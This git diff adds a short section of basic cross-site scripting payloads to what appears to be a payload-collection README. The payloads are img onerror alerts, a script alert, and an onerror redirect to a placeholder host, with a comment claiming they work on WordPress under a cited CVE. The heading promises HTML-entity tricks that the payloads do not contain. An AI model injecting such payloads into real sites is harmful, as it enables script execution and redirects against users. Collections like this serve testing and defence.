diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 94fb730d3e..6264f30207 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
MOVE HERE
MOVE HERE
```
+### XSS using entity HTML
+
+```javascript
+// Works very good at Wordpress (CVE-2025-14588)
+
+<img src=x onerror=alert(1)>
+<img src=x onerror=window.location.href="https://example.com">
+<img src=1 onerror="alert(1)">
+<script>alert(1)</script>
+```
### XSS using HTML5 tags